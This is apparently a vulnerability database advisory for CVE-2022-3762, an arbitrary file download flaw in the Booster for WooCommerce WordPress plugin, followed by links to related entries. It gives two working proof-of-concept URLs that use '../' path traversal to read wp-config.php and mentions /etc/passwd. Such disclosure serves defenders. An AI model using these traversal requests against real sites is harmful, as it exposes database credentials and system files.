Lucene search
WpvulndbWPEX-ID:96EF4BB8-A054-48AE-B29C-B3060ACD01ACHistoryOct 31, 2022 - 12:00 a.m.
Booster for WooCommerce - ShopManager+ Arbitrary File Download
2022-10-3100:00:00
wpvulndb
185
woocommerce
shopmanager+
arbitrary file download
admin
url
exploit
module
EPSS
0.001
Percentile
32.8%
The plugins do not validate files to download in some of its modules, which could allow ShopManager and Admin to download arbitrary files from the server even when they are not supposed to be able to (for example in multisite)
Enable the "Checkout File Upload" module and open the following URL as a shop manager or admin: https://example.com/wp-admin/?wcj_download_checkout_file_admin=../../../../../wp-config.php&post=1&wcj_checkout_file_number=1 (the post and wcj_checkout_file_number parameters are irrelevant)
Enable the "Product Init Fields" module and open the following URL as a shop manager or admin: http://example.com/wp-admin/?wcj_download_file=../../../../../wp-config.php
System files such as /etc/passwd can also be retrieved that wayRelated
prion
prion
Code injection
2022-11-21 11:15:00
cvelist
cvelist
CVE-2022-3762 Booster for WooCommerce - ShopManager+ Arbitrary File Download
2022-11-21 00:00:00
cnvd
cnvd
WordPress Booster for WooCommerce plugin path traversal vulnerability
2022-11-23 00:00:00
wpvulndb
wpvulndb
Booster for WooCommerce - ShopManager+ Arbitrary File Download
2022-10-31 00:00:00
patchstack
patchstack
cve
cve
CVE-2022-3762
2022-11-21 11:15:21
nvd
nvd
CVE-2022-3762
2022-11-21 11:15:21